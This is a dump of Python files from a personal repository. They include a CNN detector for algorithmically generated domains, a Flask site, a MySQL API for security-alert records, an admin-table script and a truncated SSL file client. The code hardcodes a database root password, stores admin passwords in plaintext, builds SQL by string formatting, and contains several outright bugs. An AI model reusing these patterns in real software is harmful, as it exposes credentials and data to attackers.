start_time\n return timedelta(seconds=int(round(time_dif)))\n\n'''评估在某一数据上的准确率和损失'''\ndef evaluate(sess, x_, y_,loss,acc):\n\n data_len = len(x_)\n batch_eval = batch_iter(x_, y_, batch_size)\n total_loss = 0.0\n total_acc = 0.0\n loss = tf.reduce_mean(cross_entropy)\n\n for x_batch, y_batch in batch_eval:\n batch_len = len(x_batch)\n loss_n, acc_n = sess.run([loss, acc], feed_dict={input_x: x_batch,input_y: y_batch,keep_prob: 0.25})\n total_loss += loss_n * batch_len\n total_acc += acc_n * batch_len\n return total_loss / data_len, total_acc / data_len\n\nif __name__ == '__main__':\n '''模型参数'''\n embedding_dim = 4 # 词向量维度\n seq_length = 31 # 序列长度\n num_classes = 1 # 类别数\n num_filters = 20 # 卷积维度\n kernel_size = 3 # 卷积核尺寸\n vocab_size = 39 # 词汇表达小\n dropout_keep_prob = 0.75 # dropout保留比例\n learning_rate = 0.001 # 学习率\n batch_size = 1024 # 每批训练大小\n num_epochs = 20 # 总迭代轮次\n print_per_batch = 1000 # 每多少轮输出一次结果\n save_per_batch = 1000 # 每多少轮存入tensorboard\n output_graph_name = 'model.pb' # 保存模型文件名\n output_fld = '/model/' # 保存路径\n '''载入训练集与验证集'''\n print(\"Loading training and validation data...\")\n X,Y=makeData()\n #vocab_size = len(X)\n x_train, x_val, y_train, y_val = train_test_split(X,Y,test_size=0.1)\n print(x_train.shape)\n print(y_train.shape)\n print(x_val.shape)\n print(y_val.shape)\n del X,Y\n\n '''建立模型'''\n print('Configuring CNN model...')\n # 待输入的数据\n #with tf.Graph().as_default() as g:\n input_x = tf.placeholder(tf.int32, [None, seq_length], name='input_x_')\n input_y = tf.placeholder(tf.float32, [None, num_classes], name='input_y_')\n keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')\n #创建cnn模型\n with tf.device('/cpu:0'):#强制在CPU上执行操作\n embedding = tf.get_variable('embedding', [vocab_size, embedding_dim])\n embedding_inputs = tf.nn.embedding_lookup(embedding, input_x)\n with tf.name_scope(\"cnn\"):\n conv_1 = tf.layers.conv1d(embedding_inputs, num_filters, kernel_size, name='conv_1')\n maxp = tf.layers.max_pooling1d(conv_1, 2, 2)\n conv_2 = tf.layers.conv1d(maxp, num_filters, kernel_size, name='conv_2')\n maxp = tf.layers.max_pooling1d(conv_2, 2, 2)\n flatten = tf.contrib.layers.flatten(maxp)\n with tf.name_scope(\"score\"):\n # 全连接层,后面接dropout以及sigmoid激活\n fc = tf.layers.dropout(flatten,0.25)\n fc = tf.layers.dense(fc, 16, name='fc1')\n fc = tf.layers.dense(fc, num_classes, name='fc2')\n with tf.name_scope('output'):\n \t#输出层\n logits = tf.nn.sigmoid(fc, name='main_output')\n with tf.name_scope(\"optimize\"):\n # 损失函数,交叉熵\n cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=input_y)\n loss = tf.reduce_mean(cross_entropy)\n # 优化器\n optim = tf.train.RMSPropOptimizer(learning_rate=learning_rate).minimize(loss)\n with tf.name_scope(\"accuracy\"):\n # 准确率\n logits = tf.cast(logits, tf.int32)\n y = tf.cast(input_y, tf.int32)\n correct_pred = tf.equal(logits, y)\n acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar(\"loss\", loss)\n tf.summary.scalar(\"accuracy\", acc)\n merged_summary = tf.summary.merge_all()\n\n '''创建session'''\n session = tf.Session()\n session.run(tf.global_variables_initializer())\n \n '''训练模型'''\n print('Training and evaluating...')\n start_time = time.time()\n total_batch = 0 # 总批次\n best_acc_val = 0.0 # 最佳验证集准确率\n last_improved = 0 # 记录上一次提升批次\n require_improvement = 40000 # 如果超过40000轮未提升,提前结束训练\n flag = False\n for epoch in range(num_epochs):\n print('Epoch:', epoch + 1)\n batch_train = batch_iter(x_train, y_train, batch_size)\n for x_batch, y_batch in batch_train:\n #feed_dict = 
feed_data(x_batch, y_batch, 0.75)\n            feed_dict = {input_x: x_batch,input_y: y_batch,keep_prob: dropout_keep_prob}\n            if total_batch % print_per_batch == 0:\n                # every print_per_batch batches, report performance on the training and validation sets\n                loss_train, acc_train = session.run([loss, acc], feed_dict={input_x: x_batch,input_y: y_batch,keep_prob: dropout_keep_prob})\n                loss_val, acc_val = evaluate(session, x_val, y_val, loss, acc) # todo\n                time_dif = get_time_dif(start_time)\n                msg = 'Iter: {0:>6}, Train Loss: {1:}, Train Acc: {2:>7.2%},' \\\n                    + ' Val Loss: {3:>6.2}, Val Acc: {4:>7.2%}, Time: {5}'\n                print(msg.format(total_batch, loss_train, acc_train, loss_val, acc_val, time_dif))\n            \n            session.run(optim, feed_dict=feed_dict) # run the optimization step\n            total_batch += 1\n            if total_batch - last_improved > require_improvement:\n                # validation accuracy has not improved for a long time; stop training early\n                print(\"No optimization for a long time, auto-stopping...\")\n                flag = True\n                break # break out of the loop\n            #session.run(tf.assign(learning_rate, 0.001 * (0.95 ** epoch)),float32)# decay the learning rate step by step\n            #learning_rate = session.run(lr)\n        if flag: # same as above\n            break\n\n    '''save the model'''\n    if not os.path.exists(output_fld):\n        os.makedirs(output_fld)\n    with tf.Graph().as_default() as g:\n        graph = session.graph\n        input_graph_def = graph.as_graph_def()\n        graph_util.convert_variables_to_constants\n        constant_graph = graph_util.convert_variables_to_constants(session, input_graph_def, output_node_names=['output/main_output'])\n        # because name_scope is used, the scope prefix must be added in front of main_output\n        with tf.gfile.FastGFile(output_fld+output_graph_name, mode='wb') as f:\n            f.write(constant_graph.SerializeToString())\n\n    \n" }, { "alpha_fraction": 0.6083052754402161, "alphanum_fraction": 0.6161616444587708, "avg_line_length": 26.84375, "blob_id": "0d09ef8afc10a47198a6c3f0c8d381aae700a270", "content_id": "1e0276ef291bbb3004156992e94eb7f407f15d74", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 899, "license_type": "permissive", "max_line_length": 95, "num_lines": 32, "path": "/security/db_updata.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import sqlite3\n\nconn = sqlite3.connect('admin_db.db')\nprint (\"Opened database successfully\")\n\nconn.execute('''CREATE TABLE IF NOT EXISTS admin\n        (ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n        NAME           TEXT    NOT NULL,\n        PASSWORD       CHAR(20));''')\n\n## insert a new admin record\ndef insert_admin_data():\n    conn = sqlite3.connect('admin_db.db')\n    print(\"Please input NAME:\")\n    NAME = input()\n    print(\"Please input PASSWORD:\")\n    PASSWORD = input()\n    conn.execute(\"INSERT INTO admin (ID,NAME,PASSWORD) \\\n        VALUES (null, ?, ? 
)\",list(NAME,PASSWOED))\n print (\"Records Insert successfully\")\n conn.commit()\n\nprint ('--------------------------- start fetch data from company --------------------------');\n\ncursor = conn.execute(\"SELECT id, name from admin\")\nfor row in cursor:\n print (\"ID = \", row[0])\n print (\"NAME = \", row[1])\n\nprint (\"Select Operation done successfully.\")\n\nconn.close()\n" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6704545617103577, "avg_line_length": 18.55555534362793, "blob_id": "809f4513f55a892f846258c69a4550387dffcbda", "content_id": "197bbb26feca8ad06a06697c39bbf8db63fd24cc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 528, "license_type": "permissive", "max_line_length": 41, "num_lines": 27, "path": "/www.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "from flask import *\nfrom apps.restful import api\nimport json\nfrom flask_bootstrap import Bootstrap\n\napp = Flask(__name__)\nBootstrap(app)\napp.register_blueprint(api)\n\[email protected]('/')\ndef index():\n return render_template(\"base.html\")\[email protected]('/about')\ndef resume():\n return render_template(\"resume.html\")\n\[email protected]('/blog')\ndef blog():\n return render_template(\"blog.html\")\n\[email protected]('/link')\ndef link():\n return render_template(\"link.html\")\n\nif __name__ == '__main__':\n\n app.run(host='127.0.0.1',debug=True)\n" }, { "alpha_fraction": 0.716308057308197, "alphanum_fraction": 0.7180067896842957, "avg_line_length": 33.6274528503418, "blob_id": "de8cb7cb2c3e7ad00d6ecb862bf3cbab2c180035", "content_id": "987c2915414ec81a00b5b8dd89dc25d2b99ec336", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1782, "license_type": "permissive", "max_line_length": 111, "num_lines": 51, "path": "/AIE/change/keras_to_tensorflow_new.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import sys\nfrom keras.models import load_model\nimport tensorflow as tf\nimport os\nimport os.path as osp\nfrom keras import backend as K\nfrom tensorflow.python.framework import graph_io\nfrom tensorflow.python.framework import graph_util\n#from tensorflow.tools.graph_transforms import TransformGraph\n\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n from tensorflow.python.framework.graph_util import convert_variables_to_constants\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = convert_variables_to_constants(session, input_graph_def,output_names, freeze_var_names)\n return frozen_graph\n\n\ninput_fld = sys.path[0]\n\n#keras模型文件\nweight_file = 'bigru.h5'\n#tensorflow模型文件\noutput_graph_name = 'tensor_model.pb'\n\noutput_fld = input_fld + '/tensorflow_model/'\nif not os.path.isdir(output_fld):\n os.mkdir(output_fld)\nweight_file_path = osp.join(input_fld, weight_file)\n\nK.set_learning_phase(0)\nnet_model = load_model(weight_file_path)\n\n\nprint('input is :', net_model.input.name)\nprint ('output is:', net_model.output.name)\n\nsess = K.get_session()\n\nfrozen_graph = freeze_session(K.get_session(), 
output_names=[net_model.output.op.name])\n\ngraph_io.write_graph(frozen_graph, output_fld, output_graph_name, as_text=False)\n\nprint('saved the constant graph (ready for inference) at: ', osp.join(output_fld, output_graph_name))\n" }, { "alpha_fraction": 0.564214289188385, "alphanum_fraction": 0.6013842821121216, "avg_line_length": 26.85714340209961, "blob_id": "51aa61ec0038a053845f14a74fcfd520eb57cf72", "content_id": "a6da82d347311d90c27bf91136d7556606c165fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4007, "license_type": "permissive", "max_line_length": 265, "num_lines": 140, "path": "/AIE/keras/cnn_test.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nimport numpy as np\nimport tldextract\nimport keras\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.recurrent import LSTM,GRU\n\nfrom keras.layers import Bidirectional\n\nimport sklearn\nfrom sklearn.cross_validation import train_test_split\nimport sys \ndef pad(dat, length=31, item=0):\n dat.extend((length-len(dat))*[item])\n return dat\n \ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\n\ndef makeData(black=\"./data/dga.txt\",white=\"./data/top-1m.csv\"):\n X = []\n Y = []\n no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)\n with open(black,'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip()).domain))\n Y.append(1)\n with open(\"./data/top-1m.csv\",'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip().split(',')[1]).domain))\n Y.append(0)\n\n X=np.mat(X)\n Y=np.mat(Y)\n return X,Y.T\n\n'''\ndef build_model(max_features, maxlen):\n #双向\"\"Build bi-GRU model\"\"\n # 定义顺序模型\n model = Sequential()\n model.add(Embedding(max_features, \n 32, #输出维度\n input_length=maxlen))\n model.add(Bidirectional(GRU(16)))\n model.add(Dropout(0.25)) #断开神经元的概率,防止过拟合\n model.add(Dense(16,activation=\"relu\")) #int 输出维度\n model.add(Dense(1)) #int 输出维度\n model.add(Activation('sigmoid'))\n keras.optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=None, decay=0.0) \n model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n \n return model\n\n'''\nfrom keras.layers import Conv1D, MaxPooling1D,Flatten\ndef build_model(max_features, maxlen):\n \"\"\"Build cnn model\"\"\"\n model = Sequential()\n model.add(Embedding(max_features, \n 8, #输出维度\n input_length=maxlen))\n model.add(Conv1D(16,3))\n model.add(MaxPooling1D(2))\n model.add(Conv1D(16,3))\n model.add(MaxPooling1D(2))\n model.add(Flatten())\n model.add(Dropout(0.25))\n model.add(Dense(16))\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n return model\n\n\nimport time\n\ntimestamp=time.strftime(\"%Y%m%d-%H%M%S\", time.localtime(time.time()))\nprint('Get data...')\nX,Y=makeData()\nX_train, X_test, y_train, y_test = train_test_split(X, \n Y, \n test_size=0.1)\ndel 
X,Y\nprint(X_train.shape)\nprint(y_train.shape)\nprint(X_test.shape)\nprint(y_test.shape)\n\n\nprint('Build model...')\n\nmax_features=39\nmaxlen=31\nmodel = build_model(max_features, maxlen)\n#plot_model(model, to_file='model.png',show_shapes=True)\nmodel.summary()\n\n\nbatch_size=512\nprint('Training start...')\nmodel.fit(X_train, y_train, #训练集\n validation_data=(X_test, y_test), #验证集\n batch_size=batch_size,\n verbose=1, # 进度条显示\n epochs=5) # 迭代次数\nprint('Training Done!')\n\n\n\nfileprefix=\"bigru\"\nmodel.save(fileprefix+\".krs\")\n\n\n# In[8]:\n\n\ntest_dat = X_test[:]\nprint(test_dat.shape)\nstarts=time.time()\nresults=model.predict_classes(test_dat,batch_size=512)\ntimecost=time.time()-starts\nprint(test_dat.shape[0],\"items\")\nprint(timecost,\"seconds\")\nprint(test_dat.shape[0]/timecost,\"-eps\")\n\n" }, { "alpha_fraction": 0.4334062337875366, "alphanum_fraction": 0.45827096700668335, "avg_line_length": 36.11538314819336, "blob_id": "8410c3d9947d6df6648ecf893dabfc3ddfd7b207", "content_id": "1ca73a734ea298d8f85ef48dfd2c01845f9d4790", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8939, "license_type": "permissive", "max_line_length": 177, "num_lines": 234, "path": "/search/service/data_show.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import pymysql\nimport math\nimport json\nimport configs as C\nimport time,datetime\n#R = C.DATA_MYSQL\nR = {'host': \"localhost\", 'user': \"root\", 'password': \"123456\", 'database': \"AIE_Detect_Result\"}\n\ndb = pymysql.connect(host=R['host'], user=R['user'], passwd=R['password'], db=R['database'],\\\n\tcharset = 'utf8',cursorclass = pymysql.cursors.DictCursor)\n\n#获取威胁信息\ndef get_detect_result(type,current_page,page_size,beginTime,endTime):\n threat_type_dic = {\n \"00000\":\"common\", #输出全部\n \"10000\":\"abnormal_file\", #异常文件检测\n \"20000\":\"bruteforce\", #暴力破解\n \"30000\":\"cc_flow\", #CC通信\n \"40000\":\"webshell\", #webshell\n \"50000\":\"eca\", #异常加密通信\n \"60000\":\"dns_tunnel\", #DNS tunnel\n \"70000\":\"dga\" } #DGA域名检测\n threat_type_change = {\n \"abnormal_file\" : \"10000\", #异常文件检测\n \"bruteforce\" : \"20000\", #暴力破解\n \"cc_flow\" : \"30000\", #CC通信\n \"webshell\" : \"40000\", #webshell\n \"eca\" : \"50000\", #异常加密通信\n \"dns_tunnel\" : \"60000\", #DNS tunnel\n \"dga\" : \"70000\" } #DGA域名检测\n threat_type = threat_type_dic[type.decode('utf-8')]\n cursor = db.cursor()\n beginTime = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.gmtime(beginTime))\n endTime = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.gmtime(endTime))\n try:\n cursor.execute(\"SELECT COUNT(id) as num from AIE_Detect_Result where threat_type = '%s' and time_start <= '%s' and time_start >= '%s'\" % (threat_type,endTime,beginTime))\n data_num = cursor.fetchone()['num']#数据总数\n except:\n return [], 0, '4'\n try:\n total = int(math.ceil(data_num/page_size)) #总页数\n if total == 0: \n return [], 0, '6'\n offset = (current_page-1)*page_size\n except:\n return [], 0, '1'\n try:\n cursor.execute(\"SELECT * from AIE_Detect_Result where threat_type = '%s' limit %d offset %d\" % (threat_type,page_size,offset))\n data = cursor.fetchall()\n except:\n return [], 0, '4'\n try:\n items = []\n for el in data:\n el['threat_type'] = threat_type_change[str(el['threat_type'])]\n if el['time_start'] == None:\n el.update({\"AttackType\":el['threat_type'],\n \"AlarmLevel\":el['threat_level'],\n #\"AttackSubType\":\"10001\",\n \"AlarmTime\":el['time_start'],\n \"SrcIP\":el['sip'],\n 
\"DestIP\":el['dip'],\n \"SrcPort\":el['sport'],\n \"DestPort\":el['dport']})\n el.pop(\"threat_type\")\n el.pop(\"threat_level\")\n el.pop(\"time_start\")\n el.pop(\"sip\")\n el.pop(\"dip\")\n el.pop(\"sport\")\n el.pop(\"dport\") \n items.append(el)\n else:\n el.update({\"AttackType\":el['threat_type'],\n \"AlarmLevel\":el['threat_level'],\n #\"AttackSubType\":\"10001\",\n \"AlarmTime\":el['time_start'].strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"SrcIP\":el['sip'],\n \"DestIP\":el['dip'],\n \"SrcPort\":el['sport'],\n \"DestPort\":el['dport']})\n el.pop(\"threat_type\")\n el.pop(\"threat_level\")\n el.pop(\"time_start\")\n el.pop(\"sip\")\n el.pop(\"dip\")\n el.pop(\"sport\")\n el.pop(\"dport\") \n items.append(el)\n except:\n return [], 0, '1'\n return items, total, '0'\n\ndef get_all_result(current_page,page_size):\n threat_type_change = {\n \"abnormal_file\" : \"10000\", #异常文件检测\n \"bruteforce\" : \"20000\", #暴力破解\n \"cc_flow\" : \"30000\", #CC通信\n \"webshell\" : \"40000\", #webshell\n \"eca\" : \"50000\", #异常加密通信\n \"dns_tunnel\" : \"60000\", #DNS tunnel\n \"dga\" : \"70000\" } #DGA域名检测\n cursor = db.cursor()\n try:\n cursor.execute(\"SELECT COUNT(id) as num from AIE_Detect_Result\")\n data_num = cursor.fetchone()['num']#数据总数\n except:\n return [], 0, '4'\n try:\n total = int(math.ceil(data_num/page_size)) #总页数\n print(total)\n if total == 0: \n return [], 0, '6'\n offset = (current_page - 1)*page_size\n except:\n return [], 0, '1'\n try:\n cursor.execute(\"SELECT * from AIE_Detect_Result limit %d offset %d\" % (page_size,offset))\n data = cursor.fetchall()\n except:\n return [], 0, '4'\n try:\n items = []\n for el in data:\n el['threat_type'] = threat_type_change[str(el['threat_type'])]\n #转换数据库字段\n if el['time_start'] == None:\n el.update({\"AttackType\":el['threat_type'],\n \"AlarmLevel\":el['threat_level'],\n #\"AttackSubType\":\"10001\",\n \"AlarmTime\":el['time_start'],\n \"SrcIP\":el['sip'],\n \"DestIP\":el['dip'],\n \"SrcPort\":el['sport'],\n \"DestPort\":el['dport']})\n el.pop(\"threat_type\")\n el.pop(\"threat_level\")\n el.pop(\"time_start\")\n el.pop(\"sip\")\n el.pop(\"dip\")\n el.pop(\"sport\")\n el.pop(\"dport\") \n items.append(el)\n else:\n el.update({\"AttackType\":el['threat_type'],\n \"AlarmLevel\":el['threat_level'],\n #\"AttackSubType\":\"10001\",\n \"AlarmTime\":el['time_start'].strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"SrcIP\":el['sip'],\n \"DestIP\":el['dip'],\n \"SrcPort\":el['sport'],\n \"DestPort\":el['dport']})\n el.pop(\"threat_type\")\n el.pop(\"threat_level\")\n el.pop(\"time_start\")\n el.pop(\"sip\")\n el.pop(\"dip\")\n el.pop(\"sport\")\n el.pop(\"dport\") \n items.append(el)\n except:\n return [], 0, '1'\n return items, total, '0'\n\ndef get_algorithms_type_num():\n cursor = db.cursor()\n threat_type_dic = {\n \"abnormal_file\" : \"10000\", #异常文件检测\n \"brutefoce\" : \"20000\", #暴力破解\n \"cc_flow\" : \"30000\", #CC通信\n \"webshell\" : \"40000\", #webshell\n \"eca\" : \"50000\", #异常加密通信\n \"dns_tunnel\" : \"60000\", #DNS tunnel\n \"dga\" : \"70000\" } #DGA域名检测\n threat_type_num = []\n for threat_type in threat_type_dic:\n sql = \"SELECT COUNT(id) FROM AIE_Detect_Result WHERE threat_type = '%s'\" %(threat_type)\n cursor.execute(sql)\n num = cursor.fetchone()\n num_dic = {\"key\" : threat_type_dic[threat_type], \"doc_count\" : num[\"COUNT(id)\"]}\n threat_type_num.append(num_dic)\n return threat_type_num\n\ndef get_algorithms_level_num():\n cursor = db.cursor()\n threat_level_dic = {\n 1 : \"1\", #很低\n 2 : \"2\", #低\n 3 : \"3\", #中\n 4 : \"4\", #高\n 5 : \"5\"} #很高\n 
threat_level_num = []\n for threat_level in threat_level_dic:\n sql = \"SELECT COUNT(id) FROM AIE_Detect_Result WHERE threat_level = '%d'\" %(threat_level)\n cursor.execute(sql)\n num = cursor.fetchone()\n num_dic = {\"key\" : threat_level_dic[threat_level], \"doc_count\" : num[\"COUNT(id)\"]}\n threat_level_num.append(num_dic)\n return threat_level_num\n\nif __name__ == '__main__':\n try:\n threat_type = str(\"10000\").encode(\"utf-8\")\n current_page = int(\"1\")\n page_size = int(\"20\")\n except:\n items = []\n total = 0\n resultCode = '5'\n else:\n #items, total, resultCode = get_all_result(current_page,page_size)\n items, total, resultCode= get_detect_result(threat_type,current_page,page_size)\n \n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n\t\"data\":items\n\t}\n try:\n json_data = json.dumps(rstJson)\n except:\n items = []\n total = 0\n resultCode = '5'\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n json_data = json.dumps(rstJson)\n #return json_data\n print(json_data)\n\n\n" }, { "alpha_fraction": 0.5679324865341187, "alphanum_fraction": 0.6210970282554626, "avg_line_length": 30.741071701049805, "blob_id": "1d87c4fec0209beb38190b80e54e6159a3fcd073", "content_id": "339ba1383304c3cd337f30dc8d89f5a4a5ee90e1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3627, "license_type": "permissive", "max_line_length": 265, "num_lines": 112, "path": "/AIE/tensorflow/cnn_model_prediction.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport os\nfrom tensorflow.python.framework import graph_util\nimport numpy as np\nimport time\nimport sklearn\nfrom sklearn.cross_validation import train_test_split\nfrom tensorflow.python.platform import gfile\nimport tldextract\n'''\ndef pad(dat, length=31, item=0):\n if len(dat)>length:\n dat=dat[0:length]\n else:\n dat.extend((length-len(dat))*[item])\n return dat\ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\ndef makeData():\n X = []\n X.append(domain2list('oiooiakkkkk'))\n X=np.mat(X)\n return X\n\ntest = makeData()#测试数据\n\nfrom tensorflow.python.platform import gfile\n\nsess = tf.Session()\nwith gfile.FastGFile('D:/data/'+'model.pb', 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='') # 导入计算图\n\nsess.run(tf.global_variables_initializer())#初始化\n\n# 输入\ninput_x = sess.graph.get_tensor_by_name('input_x_:0')\nop = sess.graph.get_tensor_by_name('output/main_output:0')\n\nret = sess.run(op, feed_dict={input_x: test})\nprint (ret)\n'''\n\n\ndef pad(dat, length=31, item=0):\n if len(dat)>length:\n dat=dat[0:length]\n else:\n dat.extend((length-len(dat))*[item])\n return dat\ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\ndef 
makeData(black=\"./data/dga.txt\",white=\"./data/top-1m.csv\"):\n X = []\n no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)\n with open(black,'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip()).domain))\n with open(\"./data/top-1m.csv\",'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip().split(',')[1]).domain))\n X=np.mat(X)\n return X\ndata = makeData()\nsess = tf.Session()\nwith gfile.FastGFile('D:/model/'+'model.pb', 'rb') as f:#打开模型文件\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='') # 导入计算图\nsess.run(tf.global_variables_initializer())#初始化\n# 输入\ninput_x = sess.graph.get_tensor_by_name('input_x_:0')\nop = sess.graph.get_tensor_by_name('output/main_output:0')\ntrain_data, test_data = train_test_split(data,test_size=0.1)\nstarts=time.time()\nret = sess.run(op, feed_dict={input_x: test_data})\ntimecost=time.time()-starts\nprint(test_data.shape)\nprint(test_data.shape[0],\"items\")\nprint(timecost,\"seconds\")\nprint(test_data.shape[0]/timecost,\"-eps\")\n\n\n\n\n\n\n'''\nt = 5 #样本验证轮数\nstarts=time.time()\nfor i in range(t):\n starts_0=time.time()\n train_data, test_data = train_test_split(data,test_size=0.1)\n ret = sess.run(op, feed_dict={input_x: test_data})\n timecost_0=time.time()-starts_0\n print(test_data.shape)\n print(test_data.shape[0],\"items\")\n print(timecost_0,\"seconds\")\n print(test_data.shape[0]/timecost_0,\"-eps\")\n\ntimecost=time.time()-starts_0\nprint('time:', timecost)\n'''\n" }, { "alpha_fraction": 0.5140997767448425, "alphanum_fraction": 0.5297847390174866, "avg_line_length": 33.442527770996094, "blob_id": "96150362df2fbdeb7040a57e611e8a9a22f8677f", "content_id": "230c19e82884c61e8f7984d6a0b3ba967333146a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6123, "license_type": "permissive", "max_line_length": 159, "num_lines": 174, "path": "/security/client.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import socket\nimport hashlib\nimport os\nimport struct\nimport ssl,argparse\n\ndef InitHost():\n host = \"\"\n with open(\"./host.txt\",\"r\") as fd:\n n2 = fd.readlines()\n for n in n2:\n return n\n\n\n\n\n\n\nclass FileClient():\n def __init__(self):\n self.action = ''\n self.fileName = ''\n self.md5sum = ''\n self.clientfilePath = ''\n self.serverfilePath = ''\n self.size = 0\n self.cafile = \"./cert/ca.crt\"\n self.host = InitHost()\n self.server_port = 9999\n self.dataFormat='20s20s8s32s100s100sl'\n\n def struct_pack(self):\n ret = struct.pack(self.dataFormat, self.username.encode(), self.pwd.encode(), self.action.encode(), self.md5sum.encode(), self.clientfilePath.encode(),\n self.serverfilePath.encode(), self.size)\n return ret\n\n def struct_unpack(self,package):\n self.username, self.pwd, self.action, self.md5sum, self.clientfilePath, self.serverfilePath, self.size = struct.unpack(self.dataFormat, package)\n self.username = self.username.decode().strip('\\x00')\n self.pwd = self.pwd.decode().strip('\\x00')\n self.action = self.action.decode().strip('\\x00')\n self.md5sum = self.md5sum.decode().strip('\\x00')\n self.clientfilePath = self.clientfilePath.decode().strip('\\x00')\n self.serverfilePath = self.serverfilePath.decode().strip('\\x00')\n \n def CheckUsers(self,name,pwd):\n self.ClientLink()\n \n self.username = name\n self.pwd = pwd\n ret = 
self.struct_pack()\n self.s.send(ret)\n recv = self.s.recv(1024)\n if recv.decode() == '0':\n print(\"id or pwd error!\")\n return 0\n else:\n filelist = self.s.recv(1024).decode().split(\",\")\n print(filelist)\n return 1\n\n\n def GetMD5(self,filepath):\n fd = open(filepath,\"r\")\n fcont = fd.readlines()\n fd.close()\n fmd5 = hashlib.md5(str(fcont).encode(\"utf-8\"))\n return fmd5.hexdigest() \n \n def ClientLink(self):\n purpose = ssl.Purpose.SERVER_AUTH\n self.context = ssl.create_default_context(purpose, cafile=self.cafile)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n host = InitHost()\n server_port = 9999\n self.sock.connect((host, server_port))\n self.s = self.context.wrap_socket(self.sock, server_hostname=self.host)\n\n def SendFile(self,clientfilePath,serverfilePath):\n if not os.path.exists(clientfilePath):\n print('源文件/文件夹不存在')\n return \"No such file or directory\"\n self.action = 'upload'\n self.md5sum = self.GetMD5(clientfilePath)\n self.size = os.stat(clientfilePath).st_size\n self.serverfilePath = os.path.basename(serverfilePath)\n self.clientfilePath = os.path.basename(clientfilePath)\n ret = self.struct_pack()\n\n \n try:\n #self.ClientLink()\n s = 